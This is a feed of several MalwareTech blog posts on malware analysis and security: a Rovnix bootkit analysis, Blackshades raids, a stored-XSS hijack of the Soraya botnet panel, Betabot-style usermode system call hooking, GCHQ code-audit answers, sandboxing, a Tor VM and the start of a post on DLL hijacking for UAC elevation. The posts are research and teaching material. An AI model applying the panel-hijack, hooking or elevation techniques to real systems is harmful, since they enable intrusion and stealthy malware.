Quantcast
Channel: MalwareTech
Viewing all 138 articles
Browse latest View live

Rovnix new "evolution"

$
0
0
Rovnix is an advanced VBR (Volume Boot Record) rootkit best known for being the bootkit component of Carberp. The kit operates in kernel mode, uses a custom TCP/IP stack to bypass firewalls, and stores components on a virtual filesystem outside of the partition. Yesterday Microsoft posted an update explaining a new "evolution" to rovnix that had been found.

"evolution"


The so-called Evolution

I'm Melting
The first thing i noticed was the file "melts" (delete's itself once run (well, tries to)), this is done by a lot of malware to prevent future forensics, but how this sample does it is a little less than elegant. 

So advanced

The bot drops a non-hidden batch file to the location it's run from (in my case the desktop), the batch file just uses the "DEL" command on an infinite loop, which uses all of the CPU, until the file is deleted. On my test system, the batch file actually fails because the executable locks the file, meaning it can only be deleted once the executable stops (the system reboots), when the system reboots windows stops the batch file before the executable, thus it's never deleted. 


Initial Infection
After executing the packed binary it unpacks itself and continues running, the above batch file is deployed to delete the dropper after run. For stealth reasons, the kit sits idle for an undefined amount of time (I'm yet to find out how this is done), then the system is automatically rebooted. NtShutdownSystem is hooked to receive notifications of shutdowns / reboots, so rebooting the computer will result in intimidate infection and save you a wait. Amusingly the packed dropper doesn't exit until reboot and the delay is long enough to attach a debugger, dump the unpacked code from memory, then move it to another computer.

The entire kit is packed inside the dropper, about 13 files total (32-bit and 64-bit) and during the reboot delay everything exists in one continuous block of memory and once dumped; the components can be split up by byte signature "0x4D 0x5A 0x90" (DOS header).


No VBR
The first thing i noticed after infection is that the first 16 sectors of the disk are blank (where the VBR should be located). To anyone familiar with rovnix this is a common sign of infection, as it uses the kernel driver to hide infected sectors (which is probably just as suspicious as showing them).

Ermahgerd


Stability
The kit appears to run ok on Windows XP 32-bit, but on Windows 7 64-bit it causes the PC to BSOD about every 20 minutes (Sometimes the system can even get stuck in an infinite BSOD loop).


Anti Reversing
I can't tell if I'm going crazy or the anti reversing protection is what I think it is. The driver appears to check for a wide variety of reversing tools (vbox, vmaware, wireshark, ollydbg, ida, lordpe, etc), then disregards the results and exits the thread. My tests appear to confirm this as I've infected a VM with multiple blacklisted tools running and the malware still continues the infection. 

The return value will be non-zero if any blacklisted tools are found

Disregard everything?
I've checked through the ASM multiple time, but can't seem to find anything that would result in the bot being any wiser about the environment after the execution of this thread.


Virtual File System
Remember the old rovnix filesystem? It used raw disk access to store components outside of the filesystem in non-allocated disk space, making it near impossible for the AV to find or remove? Well that has been "upgraded". The virtual filesystem is now stored inside a file in "C:\system32\", free for the AV to delete at any point (Coder couldn't figure how to access virtual filesystem from usermode?). The file-name ends in ".bin" and is a 64-bit hex value generated using the time stamp counter ("rdtsc" instruction), all files are encrypted with RC6.

Example File-name Generation

Because the file system is now vulnerable due to it being saved as a standard windows file, the coders have added a high level (and fairly useless) kernel mode rootkit to the driver. The rootkit places SSDT hooks on the following functions:
  • NtQueryDirectoryFile - Hides the file.
  • NtCreateFile - Prevents file from being opened by all except bot.
  • NtOpenFile - Same as above.
  • NtClose - No idea.
  • NtSetInformationFile - Prevents rename / delete.
  • NtDeleteFile - Prevents delete.
  • NtQueryInformationFile - Hides the file.
Additionally the rootkit also hooks some registry functions to hide keys, I can't see any sane reason why.

Each hook entry is an array of 16 bytes (4 double words)


Although this won't protect against antiviruses, it may stop usermode malware and beginner security researchers from tampering with the filesystem.


Usermode Component
This entire bootkit + kernel mode rootkit all serves to protect a small trojan which appears to run as a service and do nothing other than log keys and ammyy id's to a command and control server. The MD5 has is: 5e5f3ced234c6f7c91457a875cf4a570.


Conclusion
This isn't the work of common scriptkiddies, it's likely the coder has a moderate knowledge of kernel mode programming; however, the code is not experience with malware (using SSDT hooks and filters in a bootkit, having to move the virtual filesystem into a real file to access it from usermode, using batch file to delete melt exe). This clearly isn't an "evolution" of rovnix as Microsoft claim, it's just some random coders trying to make the bootkit compatible with their bot.

Thanks to Poopsmith for bringing the sample to my attention and Xylitol for retrieving it for me.


Finally, something to reverse. 



FBI Cybercrime Crackdown - Blackshades

$
0
0
It would seem the FBI is cracking down on cybercrime (well script-kiddies at least), with a bunch of international raids carried out in the past few days and more said to come. As of today it seems that the raids are only targeting users of "blackshades" a popular remote administration tool.



Blackshades is a remote administration tool (RAT) used for remotely accessing and controlling computers over the internet. Although RATs have many legal uses and are sold by software companies, they can also be used for malicious purposes such as data theft, spying and distributed denial of service attacks. Due to the fact that most legitimate RATs require a user to go through the standard installation process, hackers write their own versions that can invisibly infect a computer by running a single executable, this is what blackshades does.


In almost all international law, there is a grey area between what constitutes a legal RAT and an illegal one, as there is no black and white definition that separates software from malware. The authors of blackshades used the gray area to sell their malware for many years, with absolutely no legal implications. When it comes to the actual use of remote administration tools, the law is pretty clear cut: If you have permission from the owner of the computer, it's legal; if you don't it's not. Although the sales team were only marketing their product on hacking forums full of criminals, it had little legal implications for them and they made a lot of money. Blackshades was structured a lot like a regular company in the way they had a website, were registered as an LLC, accepted payments with paypal through a payment gateway, and kept detailed transaction logs; Most of this leading customers to believe that because the software was "legal", what they were doing with it was also legal, as a result most customers were paying for the software with their personal accounts, not making any effort to cover their tracks, and even posting threads about how many people they had infected online.

Threads with users bragging about how many computers
they had infected are not uncommon.

On Tuesday 13th May 2014 the FBI appears to have begun executing international raids with the help of local law enforcement. Although there appears to have been no arrests as of yet, many users of blackshades have reported police or federal officers entering their homes and confiscating any computer equipment. It is widely believe the FBI came into possession of the transaction log kept by the blackshades staff, which contained personal information of customers such as: names, addresses, and IPs. The raids coincide with a statement released by the FBI at the "Reuters Cybersecurity Summit", where they stated they would be taking "a much more offensive approach to cybercrime".

Rickey Gevers also has some interesting information on the raids: http://rickey-g.blogspot.nl/2014/05/international-ongoing-blackshades.html

Update 19th Nay 2014:
The FBI has released an official statement here, confirming that it was them orchestrating the international raids against blackshades users. The statement also confirms what many suspected for a while now, that Alex Yucel AKA marjinz, the creator of blackshades, had been arrested in Moldova (now waiting extradition to the US).

Also interesting is that they mention "operation card shop" as what put them onto the scent of blackshades. For those who don't know: Operation card shop was an FBI string operation that involved undercover agents running a carding forum for about 2 years. During the sting operation, "omniscient", the owner of hackforums, urged members to register on the carding forum and even gave the owner a  free upgraded account, it was later revealed that the same FBI agent had tried to buy hackforums a few months earlier. a member of the blackshades team, xviceral, fell victim to this trap after he accidentally gave away a free copy of blackshades (complete with free bots) to an undercover FBI agent, in return for vouching for his product.

You can see a copy of the indictments below:
http://www.justice.gov/usao/nys/pressreleases/May14/BlackshadesPR/Blackshades,%20Hogue%20Information%2013%20Cr.%2012.pdf
http://www.justice.gov/usao/nys/pressreleases/May14/BlackshadesPR/Blackshades,%20Yucel%20Indictment%20S1%2013%20Cr%20%20834_Redacted.pdf

Now for the bit I'm sure everyone is waiting for.












A few Reason for Maximum Password Length

$
0
0
A lot of people have recently been wondering the reason behind maximum password lengths, after it was revealed that eBay limited passwords to 20 characters. Many people see this as a security flaw (and in some cases it is), but often there are reasons behind it. I should also mention that I'm not speaking for eBay or any other site, I'm only highlighting some reasons for password limits.



Hashing Algorithms
Take MD5 for example, a few years ago MD5 was one of the most popular hashing algorithms for websites; However, it has quickly gone from a fairly secure algorithm to a big security no-no in the space of a few years. With large companies running huge distributed networks with custom software, it's usually easier said than done to upgrade the system to use a newer hashing algorithm (It can take months and and even years to modify all the code required across all the different systems). With that in mind, I'll explain the problem using MD5 and a hypothetical company still using such algorithm due to a lengthy upgrade process.

MD5 hashes are 16 bytes (32 hexadecimal chars which are half a byte each) in length and each byte contains 8 bits that can each be zero or one. That is (2^8)^16 or 2 ^ 128 combinations, in decimal: 340,282,366,900,000,000,000,000,000,000,000,000,000.

Now let's take our theoretical site which has a 20 char password limit. Assuming the password can contain alphanumeric characters, is case sensitive, and allows the use of standard symbols: that's 94 combinations for each character (94 ^ 20) which in decimal is 2,901,062,400,000,000,000,000,016,168,360,584,816,944.

What have we noticed already? 94 ^ 20 is far bigger number than 2 ^ 128. Sparing you any more big numbers, a 19 char pass (94 ^ 19) is significantly smaller than 2 ^ 128, so 20 chars is the shortest length of password that still (theoretically) produces more combinations than an MD5 hash can.

Because the MD5 algorithm takes input of any length, but all hashes are fixed at 16 bytes, multiple passwords can hash to the same value (see: hash collisions, collision attack). That is, your password could be the entire works of shakespear but a hacker bruteforcing the hash could theoretically find a match that is less than 20 characters (making allowing any more, a waste of resources).

Disclaimer: I use the word "theoretically" because MD5 does not generate hashes in a linear fashion, it is totally possible that multiple 20 char or less passwords could hash to the same value, but no 20 char or less password could hash to a given value; However, allowing more than 20 chars in this case would only slightly improve security as beyond this number collisions are a certainty.

Software Optimization
Let's say our software is written in C and has to hash passwords of variable length, how do we know the length of the password? Well, in C the end of a string is specified by the presence of the byte 0x00 (null byte), to get the length of the string; an application would count each byte of the string until it finds the null byte (slllllooooowwww). To speed up things we could limit passwords to a certain length, then just pad all passwords less than that length with a predefined byte. As a result we only have to handle a buffer of fixed length and not have to worry about working out the length of someones novel of a password.

If the software was storing plain-text passwords in a database (terrible idea), a length limit would also be a must, because: for reasons I'm not going to explain, databases can be handled easier and with greater speed if all fields in each row are of fixed length (in a theoretical high speed database, if one person had a 64 char password, every other user in the database should have a 64 char password field to make each row of equal length, which would result in am unnecessarily huge database).

The Ape Condition Problem
Let's say you put 4 apes in a metal cage and hang a banana on a string from the roof. Every time an ape pulls on the banana: it triggers a mechanism that electrifies the cage, shocking ALL the apes. Eventually the apes learn that touching the banana results in them all getting electrocuted. You then take one of the apes away and replace it with a new one, as soon as the new ape reaches for the banana, the other 4 apes beat the sh*t out of him. Quickly the new ape learns that touching the banana results in a beat down from the other apes. If slowly over time you keep swapping the apes out until none of the apes were there in the beginning: you now have a bunch of apes beating the sh*t out of any ape who touches the banana, and not one of them knows why.

The programming community sometimes works in a similar way. In the past due to software and hardware limitations there were many reasons to limit passwords and little reason to have long passwords (poor cracking hardware meant even short password cracking was near impossible). Over time these reasons become invalid, but some programming continue to implement such limits, their reason? Other people do it (or some 1990s forum thread tells them they'd be an idiot not to).

Alternate Security Means
A simple problem with people typing long passwords: It's likely they make a mistake while typing it. Think about credit card pin numbers, A 4 digit pin which you're hardly going to mistype. If everyone is limited to a 4 digit pin, the chances of mistyping or forgetting it are slim, which allows the system to implement harsh security measures such as locking your account after 3 failed attempts.

I should point out that such means of security only apply to systems where password hash databases are unlikely to be leaked, or the cracked database won't result in mass compromise of accounts.


Hacking Soraya Panel - Free Bot? Free Bots!

$
0
0
Some security agencies have been raving about a revolutionary new bot that combines point-of-sales card grabbing (ram scraping) with form grabbing. The bot is actually not very interesting and pretty simple, but the panel is a great deal of fun (thanks to xylitol for getting me interested).


By default the panel shows the last 25 connected bots on the index page, not very interesting or helpful feature, but it opens up a whole world of possibilities. To understand what is possible, we need to take a look at the code responsible for adding new bots the the database.


From this code we can gather enough information to "impersonate" a bot. The HTTP method is POST, 'mode' must be '1', 'uid' must be a unique number, 'compname' must be a hex encoded string and so must 'osname'. The only difficult part is the fact the panel requires the bot to use a specific user-agent; however, we can find this by reversing a sample of the bot.

Here I've put together some code to add fake bots to the pane, thus add entries to the "last 25 connections".


Now, what if we decided to be a bit naughty? Let's try and submit HTML code as the bot's computer name. I'm sure this won't work because nobody is that bad at security, right? RIGHT??


Let's see the result...


Oh dear...

We'll, cool. We can submit HTML / JavaScript but what use can that be? Well we could mess with the botmaster by using javascript to redirect him to fbi.gov, replacing the entire page with rick roll, or modify the statistics. But could we hijack all his bot? Turns out the answer is yes!

A quick look at the command page allows us to throw together some code using "XMLHttpRequest()", when executed it will result in an update command being issued to the bot. All we need to do is provide our exe path in urlencoded format.


We could pay for hosting to host our script, only a small price to pay for a lot of free bots. Or, we could just use pastebin... All we need to do now is submit javascript to the panel which will run the code from pastebin.



Once we run it, when the botmaster logs in he will see this on the statistics page (minus the red block over the ip of course)...


The result of him viewing the page will be this....


So looks like revolutionary new malware "Soraya" is a little less than revolutionary when it comes to web security. Anyone with a sample of the bot binary can mess with the botmaster or potentially hijack the entire botnet.

Web Security - As easy as 1, 2, 3.


Usermode System Call hooking - Betabot Style

$
0
0
This is literally the most requested article ever, I've had loads of people messaging me about this (after the Betabot malware made it famous). I had initially decided not to do an article about it, because it was fairly undocumented and writing an article may have led to more people using it; However, yesterday someone linked me to a few blogs posting their implementations of the hook code (without explanation), so I've finally decided to go over it seeming as the code is already available.

Win32/64 System Calls

System call is a term used to describe functions that do not execute code in usermode, instead they transfer execution to the kernel where the actual work is done. A good example of these is the native API (Ex: NtCreateFile\ZwCreateFile). None of the functions beginning with Nt or Zw actually do their work in usermode, they simply call into the kernel and allow the kernel mode function with the same name to do their work (ntdll!NtCreateFile calls ntoskrnl!NtCreateFile).

Before entering the kernel, all native functions execute some common code, this is known as KiFastSystemCall on 32-bit windows and WOW32Reserved under WOW64 (32-bit process on 64-bit windows).

Native function call path in user mode under windows 32-bit

Native function call path in user mode under WOW64

As is evident in both examples: Nt* functions make a call via a 32-bit pointer to KiFastSystemCall (x86) or X86SwitchTo64BitMode (WOW64). Theoretically we could just replace the pointer at SharedUserData!SystemCallStub and WOW32Reserved with a pointer to our code; However, in practice this doesn't work.

SharedUserData is a shared page mapped into every process by the kernel, thus it's only writable from kernel mode. On the other hand WOW32Reserved is writable from user mode, but it exists inside the thread environment block (TEB), so in order to hook it we'd have to modify the TEB for every running thread.

KiFastSystemCall Hook

Because SharedUserData is non-writable, the only other place we can target is KiFastSystemCall which is 5 byte (enough space for a 32-bit jump). Sadly that actually turned out not to be the case because the last byte, 0xC3 (retn), is needed by KiFastSystemCallRet and cannot be modified, which leaves only 4 writable bytes. 

The sysenter instruction is supported by all modern CPUs and is the fastest way to enter the kernel. On ancient CPUs (before sysenter was invented) an interrupt was used (int 0x2E), for compatibility it was kept in all subsequent versions of windows.

The now obsolete KiIntSystemCall

Here you can see, KiIntSystemCall has a glorious 7 writable bytes (enough space for a 32-bit jump and some) it's also within short jump range of KiFastSystemCall. As you've probably guessed by now, we can do a 2 byte short jump from KiFastSystemCall to KiIntSystemCall and then a 32-bit jump from within KiIntSystemCall to our hook procedure.

Now, what if something calls KiIntSystemCall? Well, it's unlikely but we can handle that too: The rule for the direction flag on windows is that it should always be cleared after a call (that is, a function should never assume it to still be set after making a call). We could use the first byte of KiIntSystemCall for STD (set direction flag), then use the first byte of KiFastSystemCall for CLD (clear direction flag) followed by a jump to KiIntSystemCall+1, that way our hook procedure can use the direction flag to see which calls came from which function.

WOW32Reserved Hook

This is a lot simpler, either we can keep track of every thread and hook WOW32Reserved in each thread's environment block (i think this is what betabot does), or we simply overwrite X86SwitchTo64BitMode which is 7 bytes, writable from user mode, and pointed to by the WOW32Reserve field of every thread's environment block.

Dispatching

Most people who write hooks are used to redirecting one function to another; however, because both of these hooks are placed on common code: every single native function will call the hook procedure. Obviously we're going to need a way to tell NtCreateFile calls from NtCreateProcess and so on, or the process is just going to crash and burn.

If we dissemble the first 5 bytes of any native function it will always be "mov eax, XX", this value is the ordinal of the function within the System Service Dispatch Table (SSDT). Once the call enters the kernel, a function will use this number to identify which entry in the SSDT to call, then call it (meaning each function has a unique number). When our hook in called, the SSDT ordinal will still be in the eax register, all we need to do is gather the SSDT ordinals for all the functions we need (by disassembling the first 5 bytes), then we can compare the number in eax with the ordinal for the function we wish to intercept calls for: if it's equal we process the call, if not we just call the original code.

Comparing the function ordinal with the one we want to hook could be messy, especially if we're hooking multiple functions.

cmp eax, [ntcreatefile_ordinal]
je ntcreatefile_hook
cmp eax, [ntcreateprocess_ordinal]
je ntcreateprocess_hook
[...]
jmp original_code

This code is going to get very long and inefficient the more functions are hooked (because every kernel call is passing through this code, the system could slow down), but there's a better way.

We can build an array of DWORDs in memory (assuming we just want to hook NtCreateFile & NtCreateProcess, let's say the NtCreateFile ordinal is 0x02 and NtCreateProcess ordinal is 0x04), the array would look like this:
my_array+0x00 = (DWORD)NULL
my_array+0x04 = (DWORD)NULL
my_array+0x08 = (DWORD)ntcreatefile_hook_address
my_array+0x0C = (DWORD)NULL
my_array+0x10 = (DWORD)ntcreateprocess_hook_address
[...]

Then we could do something as simple as:
lea ecx, [my_array]
lea edx, [4*eax+ecx] ;edx will be &my_array[eax]
cmp [edx], 0
je original_code
call [edx] ;call the address pointed to by edx

This is pretty much what the kernel code for calling the SSDT function by its ordinal would do.

Calling Original Code

As with regular hooking, we just need to store the original code before we hook it. The only difference here is as well as pushing the parameters and calling the original code, the function's ordinal will need to be moved into the eax register.

Conclusion

Feel free to ask any questions in the comments or on our forum, hopefully this post has covered everything already.


A Quick Updated

$
0
0
You've probably noticed there's been no articles in quite a while, part of this is due to a lack of interesting malware samples to look at, but It's mainly because I'm working on a new website. I've decided that MalwareTech has outgrown blogger and I'm looking to expand the site beyond the features that blogger has to offer. Currently there is no ETA on the new site and articles, but it shouldn't been more than a few weeks. I'll also be adding a few more creators to contribute to the site and keep the content flowing, as a maximum of 1 - 2 articles per a month isn't great for a site with this many readers.

Back Soon, Follow @MalwareTechNet for updates.



Astute Explorer (GCHQ Challenge 1 - 5)

$
0
0
GCHQ has been having trouble finding experienced hackers and programmers to work for them, so they've put out a lot of, admittedly fun, challenges. The idea is that people who do well in the online challenges are selected to do face to face challenges, the top few people from the face to face challenge go through to the masterclass, then the top people from the masterclass will be vetted for a job, finally if you pass the vetting process you get to waste your skill earning 35k/year playing cyber warrior for some NSA wannabes. As you can see, it's better to just use the online challenges to kill some time (You can't even apply for GCHQ unless you're a UK citizen).

Sadly I missed the first challenge, but managed to get into "Astute Explorer" just in time (It's finished now so I'm posting my answers). The challenge is an imaginary company is under cyber attack and want you to help secure their software, they have even been kind enough to provided you with random snippets of C code (without any context). Your job is to provide the line number of the vulnerability, explain why it's a vulnerability, and how to patch it. So let's take a look (my area of expertise is malware, so sorry if I end up getting stuff wrong).




Vulnerability
I'm not sure there's an exact line number, but the vulnerability here is pretty obvious. strcpy and strcat don't do any checks to make sure the target buffer is large enough to fit the string, so by providing a username/password that exceeds the size of szTotalString, you can cause a buffer overflow.

Solution
A lot of people would use functions like strlcpy/StringCchCopy, which copy as much data into the buffer as it can fit then null terminates it. In my opinion this is stupid because the code would still try to check the username and password despite the fact not all of it was copied, I'd personally do strlen on the username and password, then fail if it exceeds the maximum length.



Vulnerability
This is a fun one, you can chain multiple vulnerabilities in the code to cause a heap overflow. The height and width are user specified, so the first thought would be to specify a height and width so large that it causes an integer overflow when calculating the size on line 94, resulting in the allocated buffer being too small to accommodate board_squared_t. If you look at line 91 it makes sure that the height and width don't exceed a certain size, Foiled! Or not? The mistake here is that height and width are signed integers and if you listened in maths: multiplying 2 negative values gives a positive result. We can bypass the maximum size check by specifying large negative values instead, which will then become positive and still cause our integer overflow.

Solution
Pretty simple, just declare height and width as unsigned integers instead of signed.





Vulnerability
I literally have no idea what's going on here. Why is iSize being multiplied by the size of int (4)? What is szBuffer? What does the number is %d = %d mean? If someone handed me this code I'd assume they got their degree in a cereal box and send them back to work at geek squad. Assuming pszArguments[2] is a string and pszArguments[1] is the length of the string, the memcpy operation on line 556 is going to copy 4x more bytes that the length of the string and probably crash. It should also be noted that iArguments isn't checked, so if the user doesn't specify enough arguments, the application is going to crash.

Solution
Stop doing drugs at work.




Vulnerability
On line 84 szError is passed as the format argument to printf. Because printf will interpret any format specifiers in the format argument this is unsafe (format strings exploit). If the error string were to contain "%d%d%d" the next 12 bytes of memory on the stack would be output to the user, it's also possible to use the %n specifier to write arbitrary data to an arbitrary location.

Solution
printf("%s", szError);



Vulnerability
I wasn't able to find any major vulnerabilities here. The code leaks memory because _strdup allocates a buffer, which is never freed. There's also an off-by-one error on line 352: the code checks if the filename is larger than or equal to 3, however the extensions in the szOkExt array include the dot (4 bytes), if the user specified a 3 byte filename the code would try to compare 4 bytes and possibly (but unlikely) crash the application.

Solution
Check if cFileName is bigger than 3 and free szLCase before return.

Conclusion

I'm clearly not a hacker.
Other 5 answers coming tomorrow. 

Astute Explorer (GCHQ Challenge 5 - 10)

$
0
0
Continuation for http://www.malwaretech.com/2014/09/astute-explorer-gchq-challenge-1-5.html



Vulnerability
On line 26 the function fails if exactly BLOCK_SIZE is not read, this means if there is data available but less than BLOCK_SIZE is present, or the read fails, the function will return NULL. On failure the function does not free szBuffer so there's a pretty serious memory leak.

Solution
If the read operation fails, the function should free(szBuf) before returning null, it should also be worth considering handling the event that the read function returns less than BLOCK_SIZE.



Vulnerability
I have a hard time understanding the point of this function (it reads the data to a local buffer, which is then disregarded on return), but I'm sure making the function useful is not part of the assignment. The problem exists on line 1009; assuming GetFromInput can read more than 1 byte at a time, it can still exceed MAX_RECEIVE. For example: if MAX_RECEIVE is 10 and GetFromInput reads 20 bytes, siBytesReceived is going to be 20, the loop will exit but the data will have already been written and siBytesRecieved will already have exeeded the limit. There's also the problem that if GetFromInput can fail or return less than MAX_RECEIVE, the loop has no way of checking this and will continue looping (possibly infinitely).

Solution
The best idea would be to implement a parameter in GetFromInput that allows the user to specify the maximum amount of data to read in a single call. The function can then calculate how much data is left before MAX_RECEIVE is hit and specify a limit to prevent more than that from being read.




Vulnerability
I wasn't able to find any vulnerabilities here, unless the user supplies invalid pointers to the function (it should be their job to check they're valid, not the functions). On line 45 the loop will decrement len until it's 0 then exit, as a result it will always return 0.

Solution
Make a copy of len and then decrement the copy.





Vulnerability
If the aim of this code was to use obscure nested if/else statements to make code auditing almost impossible, then the programmer (who probably works on the security team at oracle) did a great job. I'm really not sure what's going on with the code or what err is and where it's set. Assuming err is an actual variable and not pseudo-code a runtime library function like malloc wouldn't set it; if malloc returns NULL the application is going to try and use that null pointer. There's also the issue of the use-after-free on line 52: On error ptr is freed and abrt is set, which means logError will always be passed ptr after it has been freed.

Solution
Stop hiring college kids.




Vulnerability
This piece of code should be instantly recognizable as the apple SSL bug from February (it was all over the news and security sites for months). The extra goto fail; on line 408 means the application will always skip to the cleanup code without setting err, as a result the client doesn't verify that server owns the private key matching the certificate, which opens the client up to MITM attacks.

Solution
Remove the extra goto fail;

Conclusion

Although the challenges are fun, they are really poorly made. Most of the code is taken from various websites and no context is give, leaving the player making massive assumptions about how the code works. I can't think of a real world scenario where you would have to find vulnerabilities in tiny snippet of code without knowing what they do or how the application uses them. Almost all of the vulnerabilities in this article could be non existent if the application performs check prior to calling the snippets, or if assumptions made about the imaginary functions they call are wrong.

Usermode Sandboxing

$
0
0
A lot of people (including myself, until recently) think that effective sandboxing requires a filter driver or kernel hooking, but this is no longer the case. A new security feature introduced in Windows Vista known as the Windows Integrity Mechanism can be used to create sandboxes that run entirely in usermode. Although the mechanism was not designed to be used this way, it makes for great driverless sandboxing.

The Windows Integrity Mechanism

Similar to User Account Contorl (UAC), the Windows Integrity Mechanism allows the system to restricted applications from accessing certain resources; however, it's more defined than simply elevated/unelevated. There are 4 main levels provided, which can be set by a parent process prior to execution.

System Integrity (Mandatory Label\System Mandatory Level)
This is the highest integrity level and is used by processes and services running under the Local Service, Network Service, and System account. The purpose of this level is to provide a security layer between Administrator and System, even a process running as full Administrator cannot interact with with System integrity level processes (The only exception to this rule is if the administrator account is granted SE_DEBUG_NAME privilege, then the process can enables this privilege in its token to interact with processes across integrity and user boundaries).

High Integrity (Mandatory Label\High Mandatory Level)
The default integrity level assigned to processes running under the Administrator account, if User Account Control is enabled this level will only be given to elevated processes.

Medium Integrity (Mandatory Label\Medium Mandatory Level)
Given to processes running under a limited (non-Administrator) user account or processes on an Administrator account with UAC enabled. Processes assigned this integrity level can only modify HKEY_CURRENT_USER registry keys, files in non protected folders, and processes with the same or lower integrity.

Low Integrity (Mandatory Label\Low Mandatory Level)
The lowest integrity level is not assigned to processes by default, it is either assigned through inheritance (given to processes created by other low integrity processes) or set by the parent process. A process running with low integrity level can only create/modify keys under HKEY_CURRENT_USER\Software\AppDataLow and write files to %USER PROFILE%\AppData\LocalLow. It is practically impossible for a low integrity process to make any changes to the system; However, it can still read most data.

The windows integrity mechanism has a strict set of rules which makes it a nice system for process isolation (when used properly).

  • A process cannot change its own integrity level.
  • Once a process is running, the integrity level cannot be changed (even by a higher integrity process).
  • A process can create processes with the same (or lower) integrity level, but not higher.
  • Processes cannot modify/write processes/files with a higher integrity level.
There are a few (fairly low risk) exceptions to the above rules.
  • A high integrity process granted SE_DEBUG_NAME can modify processes of higher integrity level. 
  • A medium integrity process that is signed by Microsoft can elevate some COM objects from medium to high integrity (this is what gets leveraged by the auto-elevated process UAC exploit).
  • A process can request elevation from medium to high integrity, but only on execution (spawns UAC prompt). 
Communication between a low and higher integrity process (IPC) is possible when explicitly enabled by the higher integrity process. Any of the following methods can be used:
  • Shared Memory
  • Sockets
  • RPC
  • Windows Messages
  • Named Pipes

Usermode Sandboxing

In the past usermode sandboxes would inject a dll into sandboxed processes and hook various functions within ntdll, although this was generally quite effective, applications could escape the sandbox by reading ntdll from the disk and using it to restore the hooks. Now usermode hooks are making a comeback in sandboxing, but without the previous fallbacks.




Processes can be spawned as low integrity to preventthem making changes to the system; However, in order for the sandboxed process to continue functioning normally, it may need to make some (limited) changes to the system, this is where the hooks come in. 

The sandbox creates a broker process which runs with a normal integrity level, this process then uses CreateProcessAsUser to spawn the target (sandboxed) process at low integrity. Before the target process begins execution, the sandbox dll is loaded and hooks ntdll so the hooks can be used to pass information about any calls (target function, parameter addresses, number of parameters) to the broker process via IPC. The broker process will read the parameters from the sandboxed process and filter/process calls on its behalf. Unlike with previous usermode sandboxes, removal of the hooks will result in the process not being able to modify system resources as it requires the broker process to do so on its behalf. 

This type of sandboxing is already used by some applications (Such as Chrome, Internet Explorer, and Flash Player) to reduce the attack surface for exploits. Low integrity processes are used for processing and handling of untrusted data such as javascript or flash (As a result an exploit would first have to exploit the low integrity process and then exploit the sandbox process to gain full execution on the system).  

For malware sandboxing, things are a bit different: Because low integrity processes can still manipulate other low integrity processes (most browsers run as low integrity), sandboxed malware would still be able to inject into a browser process and pass data back to a command and control server. Low integrity processes are also not very restricted in terms of reading data and could log documents and program data. To protect malware from injecting into browsers or reading personal documents, it would be possible to run the sandboxed and broker process under a different user account (CreateProcessAsUser), aslLow and medium integrity processes cannot read documents from other user's directories or interact with processes across user boundaries; However, they could still read from Program Files and System32. 

Conclusion

Although the Windows Integrity Mechanism is by no means perfect for malware sandboxing, it is definitely a considerable alternative to maintaining complex filter drivers and paying for code signing certificates. Windows 8 even introduces a new features, AppContainer, which nicely complements the Windows Integrity Mechanism by allowing processes to be restricting to only reading and writing within their install folder. If Microsoft could just manage to stop making Fisher Price user interfaces for one operating system, we may see anti-malware sandboxes shifting to usermode as people move away from Windows 7.

New IRC Launch

$
0
0
For anyone still into IRC, MalwareTech has partnered with sigterm.no to launch a new IRC network. It's still fairly new so don't expect an instant response, but everyone is welcome (socializing or just asking for help).

Easy Method
Simply use our web IRC client: https://irc.malwaretech.com/

Proper Method
The server requires SSL so you'll need a client like mIRC (Windows), HexChat (Linux/Windows), or LimeChat (Mac). For windows (if you haven't already), you may need to download and install OpenSSL.

Server:irc.malwaretech.com
Port:+6697 (Include the + for SSL)
Channel:    #MalwareTech

(Tor, I2P, and Proxies are all allowed).

Welcome to IRC



Creating a Secure Tor Environment

$
0
0
As we all know there are ways that your real IP can be leaked when using tor (JavasScript, Flash, Malware and software errors). In this tutorial I'm going to show how to create a fairly secure tor environment using VMWare, which will prevent any IP leaks. The environment can be used for general browsing and malware research.

The first thing you're going to need to do is install VMware workstation (VMware player may also work), then install your favorite windows OS.

As you can see, I'm using Windows 8 because it's a great OS with a totally decent user interface which wasn't designed by Fisher Price.
The following instructions are to be carried out on the host (the computer running VMware)
Next you're going to need to enter the Virtual Machine settings and set the Network Adapter to Bridged, this will allow your VM to act as if it's a part of the network you're connected to. I should warn you that this may not be ideal for malware research as malware could probe, and possibly exploit, devices on your network. I will do a second (more complicated) tutorial that shows how to isolate the VM from your network, whilst still allowing it to connect to the internet via Tor.



If you have multiple network interfaces on your host machine, you will need to go into the VMware "Edit" menu and click "Virtual Network Preferences", from there you can set the bridge to connect to the adapter you use for internet access.



Next you need the network (local) IP Address of the host network adapter you specified in the above. If you don't know how to do that, you can go to the network settings in control panel, right click the network adapter, click "status", then click "details" and it will be under "IPv4 Address".




You should download and install the "Vidalia Relay Bundle" as opposed to the tor browser. You can disable the relay feature by specifying "Client only".



You will also need to edit the torrc file and set it to listen on the host's network IP (and an port of your choice).



The following instructions are to be carried out inside the Virtual Machine
Now you need to setup the VM network adapter. All you need to do is go into the adapter settings, select "internet protocol version 4 (TCP/IPv4) and set "IP Address" to an IP within the network range of your host's adapter (I chose 192.168.1.99 as my host adapter is 192.168.1.66).



If you set up everything correctly thus far, you should get a response when pinging your host's network IP.



Now the VM is connected to your network but will not be able to access the internet, this is a good thing because it means once we finish the setup, internet access from within the VM will only be possible with tor.

I've decided to use proxifier, but the next few steps should work with any proxification software. First we will need to white-list the host's network IP Address so we don't get an infinite loop.



Once that's done it's time to add our proxy server. The proxy server will be the host's IP and the port you decided to install tor on.



Now set the new proxy as the default rule (you can choose to skip this step and make specific rules if you wish).



Finally you need to set the name resolution mode to always resolve via proxy or the system will not be able to look up any domains.



If everything worked, you should be able to open a browser and check that your're connected via tor. If the proxy client is closed, your VM internet will simply stop working instead of revealing your real IP.

Enjoy spending the rest of your life typing captchas.




Passive UAC Elevation

$
0
0
I had a cool idea for a way to get the user to passively elevate your application without socially engineering them to do so or requiring exploits. Obviously you could just go ahead and start mass infecting executables, but that would cause a lot of unforeseen problems and would also mean digitally signed applications from trusted providers would now appear as untrusted files. A good alternative would be hijacking a single dll.

LoadLibrary

This is something most people should already know, but I'll go ahead and clarify for anyone that doesn't. When an application calls LoadLibrary on a dll but doesn't supply the full path to the file: The system will first check the KnownDlls registry key for the path, if it's not found there, then the system will the look in the directory the application was executed from, before finally looking in system paths such as system32/syswow64.

